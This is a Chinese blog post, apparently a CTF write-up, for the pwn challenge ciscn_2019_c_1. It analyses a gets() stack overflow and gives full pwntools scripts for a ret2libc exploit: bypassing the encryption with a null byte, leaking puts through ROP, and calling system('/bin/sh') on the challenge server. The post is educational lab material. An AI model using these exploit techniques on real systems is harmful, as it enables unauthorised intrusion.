ctf【ciscn_2019_c_1】

已于 2022-10-29 12:10:30 修改
阅读量330 收藏
点赞数
分类专栏: CTF-PWN 文章标签: 安全
于 2022-10-29 12:09:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangliang_/article/details/127585391
版权

逆向

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h] BYREF
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

攻击思路

(1)由于存在 v0 >= strlen(s)的判断,而strlen是以s中\x00为判断依据判断s字符串长度,因此可以在s首部存入\x00避开加密程序

(2)【注意】找到execve(“/bin/sh”) 在libc中的偏移量后需要通过泄露puts地址来计算libc的基地址,puts的真实地址存在puts@got表中,函数在libc文件中。可以通过puts函数泄露puts的地址然后计算加载的libc文件的基地址,最后计算execve(“/bin/sh”)的实际地址。

加载:动态链接文件加载时有时候会重新改变基地址但是偏移(8位地址的后4位是一样的)是不变的(寻址方式是基地址+偏移量)

(3)ROPgadget --binary ./ciscn_2019_c_1

pop rdi ret的地址为0x400c83

ret的地址为0x4006b9

(4)gdb ciscn_2019_c_1

main函数的地址0x400b28

(5)通过溢出输出puts函数的真实地址

encrypt_addr
puts_plt
puts_got
pop_rdi_ret
padding(0x58B)

puts_plt()调用puts函数打印出puts_got地址

from pwn import *
from LibcSearcher import *
p=remote('node4.buuoj.cn',27055)
elf=ELF('./ciscn_2019_c_1')

puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_addr=0x0000000000400c83
encrypt_addr=elf.symbols['encrypt']
p.sendlineafter("Input your choice!",b'1')
payload=b'\x00'+b'a'*0x57+p64(pop_addr)+p64(puts_got)+p64(puts_plt)+p64(encrypt_addr)

p.sendlineafter("Input your Plaintext to be encrypted",payload)
p.recvline()
p.recvline()
put_addr=u64(p.recvuntil('\n').ljust(8,b'\x00'))
print(hex(put_addr))

(6)通过libc找到"/bin/sh"和system()并实施攻击

首先填入0x58字节的填充模块,再填入ret和pop rdi的地址,再填入参数"\bin\sh"和system()函数地址

脚本攻击

from pwn import *
from LibcSearcher import *
p=remote('node4.buuoj.cn',29076)
elf=ELF('./ciscn_2019_c_1')

puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_addr=0x0000000000400c83
ret_addr=0x4006b9
encrypt_addr=elf.symbols['encrypt']
p.sendlineafter("Input your choice!",b'1')
payload=b'\x00'+b'a'*0x57+p64(pop_addr)+p64(puts_got)+p64(puts_plt)+p64(encrypt_addr)

p.sendlineafter("Input your Plaintext to be encrypted",payload)
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(put_addr))

system=put_addr-0x31580
binsh=put_addr+0x1334da
p.recvuntil('encrypted\n')
payload=b'\x00'+b'a'*0x57+p64(ret_addr)+p64(pop_addr)+p64(binsh)+p64(system)+p64(encrypt_addr)
p.sendline(payload)
p.interactive()

ACanary
关注
专栏目录
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5933
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
ciscn_2019_en_2
m0sway的博客
03-25 1656
ciscn_2019_en_2 WriteUp BUU_PWN
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 7451
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 816
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 399
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
ciscn_2019_c_1
m0_52231248的博客
11-02 177
ciscn_2019_c_1 Ubuntu 18 Checksec发现开启nx保护 审计代码 Get函数存在溢出点offest=0x50+8 寻找程序是否存在system函数和/bin/sh字段来减少我们的工作量 结果都没有,但我们看到了puts函数我们可以通过ret2libc来泄露libc基址再通过查询got表确定libc中system函数和bin_sh字段。 这里有个要注意的点是Ubuntu18,puts函数前要pop_rdi_rdi 我们通过Ropgadge
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 585
Buu CTF PWN题ciscn_2019_c_1的WriteUp
CTF】【PWN】ciscn_s_3题解
m0_50819561的博客
09-23 789
前置知识: 64位系统: 传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号为0,sys_write 的调用号 为1 stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15 调用方式: 使用 syscall 进行系统调用 首先惯例checksec一下。发现NX保护开了。 用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下 tab转汇编
[V&N2020 公开赛]easyTHeap + ciscn_2019_final_3 ——heap中tcache的一些简单利用方法
PLpa的博客
06-06 1110
在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注意libc版本。 对tcache不是很了解建议看看CTFWiKi 1.[V&N2020 公开赛]easyTHeap 保护全开,libc2.27版本,进入IDA 看到程序有增删改查的功能。 我们一个个来看: add: 我们可以看到add中不能写入数据。 edit: add中不能读入的数据由edit来读入。 show: 没什么特殊的,就是输出数据,这里我们可以用其来查看我们泄露的地址。 dele
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2458
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
ciscn_2019_c_1【BUUCTF
qq_41696518的博客
08-26 1217
ciscn_2019_c_1【BUUCTF
weiteUP-ciscn_2019_c_1
weixin_52111404的博客
08-07 1936
平衡栈、执行system函数前栈空间应栈对齐;LibcSearcher安装使用和原理浅析
[CISCN 2019 初赛]Love Math
shawdow_bug的博客
06-17 991
能得到任意字符串的无字符串实参payload
CTF例题(writeup)
最新发布
2302_78189290的博客
06-23 494
观察最后的AA,联想到base64编码最后常出现的==,A的ASCII码值为65,=的ASCII的码值为61,分析可能是base64编码做了偏移,尝试将密文所有字符的ASCII码值-4,然后再做base64解码。遍历密文字符串的每个字符,获取它的ascii码值,-4之后转化为新的ASCII字符,拼接转化的字符之后获得还原的base64字符串,然后再做base64解密。这里的4就相当于凯撒密码的密钥。第14把钥匙的结果是Rtrbse{3d811d068e5bd27da4ab1b37723c7dd2}
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4908
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1357
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
【BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4117
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ACanary

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值